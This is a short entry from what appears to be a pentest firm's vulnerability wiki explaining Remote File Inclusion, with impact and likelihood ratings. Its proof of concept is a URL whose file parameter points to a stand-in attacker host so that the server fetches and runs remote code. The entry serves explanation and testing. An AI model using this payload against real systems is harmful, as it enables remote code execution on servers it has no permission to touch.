Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

Remote File Inclusion

POC

Call a remote file as below: http://vulnerablehost/vulnpage.php?file=http://attackersite/malicouspage In this case the remote file is going to be included and any code contained in it is going to be run by the server.

Impact

Medium-High

Likelihood

Medium-High